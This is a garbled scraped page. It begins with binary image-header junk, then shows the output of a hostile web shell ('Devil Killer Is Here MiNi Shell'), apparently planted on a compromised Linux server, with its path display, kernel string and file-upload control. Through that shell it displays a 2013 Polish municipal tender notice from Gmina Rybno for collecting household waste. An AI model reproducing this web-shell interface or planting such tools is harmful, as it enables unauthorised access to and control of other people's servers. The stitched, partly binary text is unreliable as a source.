JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130517/193194-N-2013.html

<p class="kh_header"><b>Rybno: Odbiór i zagospodarowanie odpadów komunalnych  z nieruchomości zamieszkałych z terenu Gminy Rybno.</b><br>
<b>Numer ogłoszenia: 193194 - 2013; data zamieszczenia: 17.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rybno , ul. Długa 20, 96-514 Rybno, woj. mazowieckie, tel. 046 8611438, faks 046 8611438.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rybno.e-sochaczew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych  z nieruchomości zamieszkałych z terenu Gminy Rybno..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbieranie i zagospodarowanie (odzysk lub unieszkodliwienie), wskazanych w opisie zamówienia, odpadów komunalnych z nieruchomości zamieszkałych na  terenie Gminy Rybno, w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania, zgodnie z zapisami ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2012 r. poz. 391 z późn. zm. ), zapisami Wojewódzkiego Planu Gospodarki Odpadami dla Mazowsza, przyjętego uchwałą Sejmiku Województwa Mazowieckiego nr 211 12 z dnia 22.10.2012 roku w sprawie uchwalenia Wojewódzkiego Planu Gospodarki Odpadami dla Mazowsza na lata 2012-2017 z uwzględnieniem lat 2018-2023 z załącznikami  oraz przepisami Regulaminu utrzymania czystości i porządku na terenie gminy Rybno.W niniejszym opisie przedmiotu zamówienia przez pojęcie właściciela nieruchomości należy  rozumieć także współwłaścicieli, użytkowników wieczystych oraz jednostki organizacyjne  i osoby posiadające  nieruchomości w zarządzie lub użytkowaniu, a także  inne podmioty władające nieruchomością.
1.Odbieranie odpadów komunalnych z zabudowy jednorodzinnej;
Na terenie zabudowy jednorodzinnej obowiązywać będzie  mieszany, pojemnikowo- workowy system zbiórki odpadów komunalnych:
  1)Niesegregowane (zmieszane) odpady komunalne (kod 20 03 01).
a)Niesegregowane (zmieszane) odpady komunalne odbierane będą z pojemników   o pojemności 120 l lub 240 l. i  worków o pojemności 120 l w przypadku przepełnienia pojemnika. Właściciel nieruchomości utrzymuje je w odpowiednim stanie sanitarnym , porządkowym  i technicznym,
b) Częstotliwość odbioru i  wywozu niesegregowanych  (zmieszanych) odpadów  komunalnych - co najmniej raz na 4 tygodnie  , zgodnie z  harmonogramem przedłożonym  przez Wykonawcę, uzgodnionym i zaakceptowanym przez   Zamawiającego w godzinach (7.00-20.00)
2) Selektywnie  zebrane odpady komunalne ( odpady segregowane) w tym odpady (kody:      10 01 01, 15 01 01, 15 01 02, 15 01 04, 15 01 07, 20 01 01, 20 01 02, 20 01 13, 20 01 14, 20 01 15, 20 01 17, 20 01 19, 20 01 21, 20 01 23, 20 01 26, 20 01 27, 20 01 28, 20 01 29, 20 01 30, 20 01 33, 20 01 34, 20 01 35, 20 01 36, 20 01 39, 20 01 40, ex 20 01 99, 20 02 01, 16 01 03, 17 01 01, 17 01 02, 17 01 03, 17 01 07, 17 02 01, 17 02 02, 17 02 03, 17 03 02, 17 04 01, 17 04 02, 17 04 03, 17 04 04, 17 04 05, 17 04 06, 17 04 07, 17 04 11, 17 05 08, 17 06 04, 17 08 02, 17 09 04, ex 20 03 99, 20 03 07 ). 
a) Odbiór selektywnie zebranych odpadów komunalnych na terenie zabudowy jednorodzinnej będzie się   odbywać  w systemie workowym. Wprowadza się 3 rodzaje worków w różnych kolorach: 
-na odpady z tworzyw sztucznych, metali  oraz opakowaniowych odpadów wielomateriałowych,
- papieru  i tektury,
- na odpady ze szkła,
 b) Worki do odbioru od właścicieli  nieruchomości , selektywnie  zebranych odpadów   komunalnych zapewnia Wykonawca. Przedmiotowe worki powinny posiadać następujące parametry:
-materiał - folia polietylenowa LDPE, półprzezroczysta , o grubości zapewniającej odpowiednią wytrzymałość  mechaniczną  worków tj. co najmniej 60 mikronów, pojemność worka na szkło 60l na pozostałe odpady minimalna pojemność: 120l oznakowanie worków: worki muszą być opatrzone nadrukiem odpadu na jaki są przeznaczone , na workach muszą widnieć adres i dane kontaktowe Wykonawcy. Zamawiający zastrzega sobie prawo do uzgodnienia szaty graficznej worków przeznaczonych do selektywnej zbiórki odpadów.
c)Worki do odbioru selektywnie zbieranych odpadów komunalnych Wykonawca zobowiązany jest dostarczać w ilościach zapewniających sprawne funkcjonowanie systemu. Worki do pierwszego odbioru selektywnie zbieranych odpadów komunalnych będą dostarczone mieszkańcom najpóźniej do dnia 1 lipca 2013 roku.
d)Częstotliwość  odbioru i wywozu - worki z odpadami  selektywnie zebranymi odbierane będą  co najmniej raz na 3 miesiące, zgodnie z harmonogramem przedłożonym przez Wykonawcę, uzgodnionym i zaakceptowanym przez Zamawiającego w godzinach (7.00-20.00)
 e ) Obowiązkiem Wykonawcy będzie uzupełnienie na własny koszt właścicielom nieruchomości 
  worków do selektywnego zbierania odpadów komunalnych po każdorazowym odbiorze , poprzez  pozostawienie na nieruchomości nowych , pustych worków w dniu odbioru selektywnie zebranych odpadów komunalnych , w tej samej ilości dla danego rodzaju co worki odebrane . Dotyczy tylko osób, które zdeklarowały , iż będą segregować odpady komunalne.
f) Popiół odbierany będzie w workach  jutowych minimum 1  raz do  roku.( worki zapewnia właściciel nieruchomości)
   g)  meble i inne odpady   wielkogabarytowe,  wyeksploatowany    sprzęt     elektryczny i        elektroniczny,  akumulatory,    chemikalia,     zużyte    opony,    odbierane  z  wyznaczonych miejsc    w   formie    mobilnego  punktu   selektywnej    zbiórki  odpadów  nie rzadziej niż 1 raz      w roku,   w  godzinach  (7.00- 20.00)
  h) odpady budowlane i rozbiórkowe  pochodzące    z     remontów    odbierane  z  wyznaczonych miejsc  w   formie    mobilnego  punktu   selektywnej    zbiórki  odpadów  nie rzadziej niż 1  raz  w  roku, w godzinach  ( 7.00-20.00) 
i)	zużyte baterie i akumulatory małogabarytowe będą odbierane przez Wykonawcę
z wyznaczonych miejsc na terenie Gminy Rybno na zgłoszenie telefoniczne o zapełnieniu w ciągu 48 godzin.
2.Dane ilościowe pozwalające ocenić ( oszacować wartość zamówienia  nie stwarzające limitu zamówienia).
1). Szacuje się , że na terenie gminy Rybno istnieje 823 nieruchomości w zabudowie jednorodzinnej.
2). Powierzchnia Gminy Rybno wynosi 72,84 km2, 
3)Liczba mieszkańców na terenie gminy Rybno na dzień 31.12.2012r - 3498 osób
( dane z ewidencji ludności)
-wg złożonych  deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi        
 -3134 osoby ,  w tym w zabudowie jednorodzinnej 3134 osoby
-liczba mieszkańców do objęcia systemem gospodarki odpadami 3334 osoby.
4). Gmina Rybno posiada na swoim terenie ok. 100 km dróg przy których zamieszkują mieszkańcy.( dane na podstawie km z odśnieżania dróg)
5). Odbiór odpadów z zabudowy jednorodzinnej z pojemników 120l  i 240 l i worków .
6). Ilość odpadów odebranych  z terenu gminy Rybno , określona na podstawie sprawozdań składanych przez przedsiębiorców posiadających zezwolenie na odbieranie odpadów komunalnych w roku 2012 wyniosła: 
a) Zmieszane odpady komunalne - 416, 47 Mg
b) Papier i tektura - 23,62 Mg
c) Szkło-   27,51 Mg
d)Tworzywa sztuczne - 14,41 Mg. 

  Według Urzędu Statystycznego w Warszawie w 2011r. na 1 mieszkańca Mazowsza  przypadało  0,361 Mg wytworzonych odpadów komunalnych 
 Urządzenia do gromadzenia odpadów: pojemniki i worki, które zostaną ustawione w miejscach   gromadzenia odpadów wskazanych przez Zamawiającego, zapewnia Wykonawca.
Przedmiotem zamówienie nie jest objęte odbieranie i zagospodarowanie odpadów komunalnych z terenu  gminy z nieruchomości niezamieszkałych. 
Struktura mieszkańców Gminy w zakresie postępowania z odpadami komunalnymi           
( na dzień  15.05.2013r.)
Udział osób niesegregujących odpady  - 3,0 %  (1)
Udział osób segregujących odpady -  97% (1)
Uwaga (1)
Zamawiający zastrzega sobie prawo zmiany procentu udziału osób niesegregujących i segregujących odpady .Ich procentowy udział w ciągu okresu realizacji zamówienia może ulec zmianie. 
Orientacyjna liczba nieruchomości, z których będą odbierane odpady komunalne.
-zabudowa jednorodzinna ;
-miejscowość :Antosin - liczba pkt. odbioru -29, liczba osób- 94, 
-Aleksandrów - liczba pkt. Odbioru -25, liczba osób -116, 
-Bronisławy  - liczba pkt. odbioru -24 , liczba osób -74, 
-Cypriany- liczba pkt . Odbioru - 40, liczba osób -156, 
-Ćmiszew Parcel-  liczba pkt . Odbioru-19, liczba osób- 89,
-Ćmiszew Rybnowski- liczba pkt . Odbioru -25, liczba osób-107,
-Erminów - liczba pkt . Odbioru- 38, liczba osób- 160,
-Jasieniec- liczba pkt . Odbioru - 45 ,liczba osób -179,
-Józin- liczba pkt . Odbioru - 23 ,liczba osób- 90,
-Konstantynów- liczba pkt . Odbioru -25, liczba osób- 111,
-Karolków Szwarocki -liczba pkt . Odbioru -33, liczba osób- 131,
-Karolków Rybnowski - liczba pkt. Odbioru - 31, liczba -137,
-Koszajec -liczba pkt . Odbioru -16, liczba osób -51,
-Ludwików- liczba pkt . Odbioru -18, liczba osób -80,
-Nowy Szwarocin- liczba pkt . Odbioru -22, liczba osób -102,
-Nowa Wieś  -liczba pkt . Odbioru -21 , liczba osób- 77,
-Matyldów -liczba pkt . Odbioru -30, liczba osób- 108,
-Rybionek-  liczba pkt . Odbioru -12, liczba osób - 49,
-Rybno- liczba pkt . Odbioru -146 , liczba osób- 581,
-Sarnów- liczba pkt . Odbioru - 40 ,l iczba osób -168,
-Stary Szwarocin -liczba pkt . Odbioru - 18, liczba osób - 92,
-Wesoła -liczba pkt . Odbioru -16, liczba osób -80,
-Wężyki- liczba pkt . Odbioru -61, liczba osób - 233,
-Złota -liczba pkt . Odbioru - 45, liczba  osób-165 
               gdzie: 1) - Uwaga -  Liczba nieruchomości może ulec zmianie. Zamawiający zastrzega sobie prawo zmiany liczby punktów  odbioru odpadów komunalnych. Ich ilość w ciągu okresu realizacji zamówienia może ulec zmianie. 
3.Obowiązki Wykonawcy:
1) Wykonawca  jest zobowiązany do transportu odebranych odpadów komunalnych do instalacji odzysku i unieszkodliwienia odpadów lub do regionalnych instalacji przetwarzania odpadów komunalnych bądź instalacji zastępczych;
2) Wykonawca zobowiązany będzie podczas realizacji zamówienia zapewnić osiągniecie odpowiednich poziomów  recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania zgodnie z :
a) art.3 ust.2 pkt 7, art.3b i art. 3 c ustawy z dnia   13 września  1996  r.  o  utrzymaniu  czystości i porządku w gminach  ( t. j. Dz. U. z 2012 r. poz. 391 z późn. zm. ),
b)  rozporządzeniem  Ministra  Środowiska  z  dnia  29  maja  2012 r.  w  sprawie  poziomów  recyklingu,   przygotowania    do  ponownego    użycia  i    odzysku  innymi   metodami  niektórych   frakcji   odpadów   komunalnych  ( Dz. U.   z    2012   r.    poz. 645 )  
     c)  Rozporządzeniem  Ministra  Środowiska   z   dnia   25   maja 2012 r.  w sprawie poziomówograniczenia       masy        odpadów       komunalnych        ulegających      biodegradacji przekazywanych do składowania oraz sposobu  obliczania  poziomu  ograniczania masy  tych odpadów ( Dz. U. z 2012 r. poz. 676).
     d) uchwałą Nr 211/12 Sejmiku Województwa Mazowieckiego z dnia 22.10.2012 roku w sprawie uchwalenia Wojewódzkiego  Planu Gospodarki Odpadami  dla Mazowsza na lata    2012-2017 z uwzględnieniem lat 2018-2023 z załącznikami.
3). Wykonawca jest obowiązany do realizacji   reklamacji  ( nieodebranie z nieruchomości odpadów zgodnie z harmonogramem , niepozostawienie worków na odpady segregowane itp.) w przeciągu 48  godzin od otrzymania zawiadomienia e- mailem lub telefonicznie od Zamawiającego. Załatwienie reklamacji należy niezwłocznie potwierdzić e- mailem do Zamawiającego;
4).Wykonawca wyposaży nieruchomość w pojemniki na podstawie  zapisów Regulaminu utrzymania czystości i porządku na terenie gminy Rybno.
5). Zamawiający będzie przekazywał Wykonawcy w formie pisemnej , informacje o zmianach w liczbie i lokalizacji nieruchomości objętych obowiązkiem odbierania odpadów;
6). Wykonawca zobowiązany będzie, w zakresie  przedmiotu zamówienia do monitorowania wywiązywania się przez właścicieli nieruchomości z obowiązku selektywnego zbierania odpadów komunalnych. W przypadku stwierdzenia , że właściciel nieruchomości nie dokonuje  segregacji odpadów , Wykonawca  odbiera odpady jako niesegregowane ( zmieszane ) odpady komunalne.
Wykonawca zobowiązany będzie w terminie 5 dni roboczych od dnia zaistnienia opisanej sytuacji do poinformowania Zamawiającego w formie  pisemnej , o nie wywiązaniu się z obowiązków segregacji odpadów przez właściciela nieruchomości . Do informacji  Wykonawca zobowiązany będzie załączyć dokumentację w formie fotografii nieruchomości  i protokół z zaistnienia takiego zdarzenia. Z dokumentacji musi jednoznacznie wynikać , jakiej dotyczy nieruchomości  i w jakim dniu doszło do ustalenia ww. zdarzenia;
7). Wykonawca jest zobowiązany do przedkładania Zamawiającemu raportów  miesięcznych zawierających informacje o liczbie i rodzaju opróżnianych pojemników i worków z poszczególnych nieruchomości. Sprawozdanie obejmowało będzie każdy miesiąc wykonywanej usługi. Ilość odebranych odpadów winna być podana w Mg. Wykonawca ponadto wskaże w nim poszczególne rodzaje odpadów - zmieszane, segregowane.
Sprawozdanie  Wykonawca przekazuje Zamawiającemu do 10 dnia miesiąca następującego po      okresie sprawozdawczym. Raporty i informacje dotyczące wywozu odpadów  powinny być    dostosowane do systemu informatycznego Zamawiającego;
     8). Wybrany Wykonawca zobowiązany będzie do przygotowania i przedłożenia do zatwierdzenia  Zamawiającemu harmonogramu  wywozu odpadów w II półroczu 2013r, nie później niż w ciągu 10 dni od podpisania umowy. Harmonogramy na kolejne lata będą  sporządzane  na podstawie terminów zawartych w harmonogramie z 2013r.
9). Wykonawca zobowiązany będzie do dystrybucji harmonogramów wśród  właścicieli nieruchomości w ciągu 7 dni od ich zatwierdzenia przez Zamawiającego. Wykonawca zobowiązany będzie również do dystrybucji wśród właścicieli nieruchomości innych dokumentów związanych z Systemem Gospodarki Odpadami ( tj; ulotek, ogłoszeń itp.)
10).Wykonawca  zobowiązany będzie do zabierania dostawionych przy pojemnikach worków z odpadami komunalnymi (właściciele nieruchomości mają możliwość dostawienia tego rodzaju worków w przypadku gdy pojemność pojemnika w danym okresie miesiąca będzie niewystarczająca)oraz poinformowania Zamawiającego o miejscach odbioru tego rodzaju worków, w celu przeprowadzenia kontroli ilości osób zamieszkującą daną nieruchomość;
11).Wykonawca zobowiązany będzie  do odbioru i transportu odpadów , również w przypadkach , kiedy dojazd do nieruchomości , z których są odbierane odpady komunalne  będzie znacznie utrudniony z powodu  remontów dróg, dojazdów itp. w takich przypadkach Wykonawcy nie przysługują roszczenia z tytułu wzrostu kosztów  realizacji przedmiotu umowy.
12).Wykonawca zobowiązany jest  do przestrzegania przepisów uchwały Nr XXXII 167 13 Rady Gminy Rybno z dnia 17  kwietnia 2013 r. w sprawie przyjęcia   Regulaminu utrzymania czystości i porządku na terenie Gminy Rybno oraz uchwały nr XXXIII 174 13 Rady Gminy Rybno z dnia 30 kwietnia 2013r. w  sprawie zmiany uchwały  Nr XXXII 167 13 Rady Gminy Rybno z dnia 17 kwietnia 2013r w sprawie przyjęcia   Regulaminu utrzymania  czystości i porządku na terenie Gminy Rybno..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający   przewiduje   udzielenie zamówienia uzupełniającego  w trybie art.67 ust.1 pkt 6 ustawy do wysokości 20% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.53.30.00-2, 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wadium należy wnieść przed upływem terminu składania ofert do dnia 27.05.2013r. , o którym mowa w Rodz. XI ust.1   pkt.1 niniejszej Specyfikacji Istotnych Warunków Zamówienia;
  2.Za dzień wniesienia wadium w pieniądzu uważa się datę wpływu środków finansowych    ( wadium) na rachunek Zamawiającego , a nie datę obciążenia rachunku Wykonawcy (wpłaty)   
3.Wadium w wysokości : 10 000,00 zł ( dziesięć tysięcy złotych)  zgodnie z art.45 ust.6 Ustawy) Wykonawca może wnieść w:
     1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy Oszczędnościowo-      kredytowej z tym,  że poręczenie kasy jest zawsze poręczeniem pieniężnym
    3) gwarancjach bankowych,
    4) gwarancjach ubezpieczeniowych,
    5) poręczeniach udzielonych przez podmioty, o których mowa w art.6 b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2007r.  Nr 42, poz. 275 z późn. zm.).
4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy : Bank Spółdzielczy w Sochaczewie Oddział  w Rybnie nr : 14 9283 0006 0034 0135 2000 0030       z dopiskiem  PRZETARG  NA  ODBIÓR ODPADÓW.
  5. Dowód wpłaty wadium należy dołączyć do złożonej oferty;
  6.  Oferta nie zabezpieczona wadium ( w formie  zgodnej z art.45 ust.6 Ustawy) zostanie                        
  odrzucona;
7. W  przypadku wniesienia wadium w postaci poręczenia lub gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez podmioty , o których mowa w art.6b ust.5 pkt.2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, oryginał musi być złożony wraz z ofertą w oddzielnej kopercie zwrotu i musi być wystawione na cały okres związania z ofertą, natomiast potwierdzona za zgodność z oryginałem kopia winna być załączona (wpięta) do oferty. Do tak złożonego wadium wskazane jest dołączenie pisemnej informacji dotyczącej sposobu jego zwrotu. W przypadku braku powyższej informacji zwrot wadium w przypadkach wymienionych w Ustawie nastąpi na adres Wykonawcy.
Uwaga:
 Niedopuszczalne jest wpłacenie wadium w kasie Urzędu Gminy w Rybnie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Opis sposobu dokonywania oceny spełnienia tego warunku
O udzielenie zamówienia mogą ubiegać się Wykonawcy , którzy spełniają warunki określone w art. 22 ust.1 Ustawy , tj. warunki dotyczące:
1) posiadania uprawnień do wykonywania  określonej działalności  lub czynności , jeżeli przepisy prawa nakładają  obowiązek ich posiadania , w tym zakresie Zamawiający wymaga  , aby Wykonawca posiadał :
a) aktualne zezwolenie na prowadzenie  działalności w zakresie  transportu odpadów komunalnych wydane przez właściwego starostę wymagane  na podstawie  ustawy  z dnia   27 kwietnia 2001r.  o odpadach ( Dz. U. z 2010r. Nr 185, poz.1243 z późn.zm)
b) aktualny wpis  do rejestru działalności regulowanej w zakresie  odbierania odpadów komunalnych od właścicieli nieruchomości  wymagany na podstawie ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach( Dz .U. z 2012r., poz.391 z późn.zm.).
2. Opis  sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu
1)ocena ofert w zakresie spełniania warunków  udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych w niniejszej Specyfikacji Istotnych Warunków Zamówienia na zasadzie spełnia/ nie spełnia tzn. każdy z Wykonawców musi spełniać wszystkie  enumeratywnie  wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia Wykonawcy;
2)sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin Komisji przetargowej powołanej do przygotowania i przeprowadzenia  przedmiotowego postępowania;3)w przypadku złożenia przez Wykonawcę dokumentów  zawierających  dane finansowe wyrażone w walutach innych niż PLN, sprawdzenie spełnienia warunków nastąpi poprzez przeliczenie tej waluty na PLN według bieżącego kursu średniego walut obcych w złotych na podstawie tabeli kursów Narodowego Banku Polskiego z dnia publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy , którzy spełniają warunki określone w art. 22 ust.1 Ustawy , tj. warunki dotyczące:posiadania wiedzy i doświadczenia.
W tym zakresie Zamawiający  wymaga , aby Wykonawca wykonał , a w przypadku usług okresowych lub ciągłych również wykonywał w okresie 3 lat przed dniem upływu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , usługi odbierania i transportu odpadów komunalnych z nieruchomości, w sposób ciągły przez okres minimum 12 miesięcy o łącznej masie  min. 500 Mg niesegregowanych ( zmieszanych ) odpadów komunalnych (20 03 01) Fakt należytego  wykonania usługi należy udokumentować stosownym dowodem.
Opis  sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu
1)ocena ofert w zakresie spełniania warunków  udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych w niniejszej Specyfikacji Istotnych Warunków Zamówienia na zasadzie spełnia/ nie spełnia tzn. każdy z Wykonawców musi spełniać wszystkie  enumeratywnie  wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia Wykonawcy;
2)sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin Komisji przetargowej powołanej do przygotowania i przeprowadzenia  przedmiotowego postępowania;3)w przypadku złożenia przez Wykonawcę dokumentów  zawierających  dane finansowe wyrażone w walutach innych niż PLN, sprawdzenie spełnienia warunków nastąpi poprzez przeliczenie tej waluty na PLN według bieżącego kursu średniego walut obcych w złotych na podstawie tabeli kursów Narodowego Banku Polskiego z dnia publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
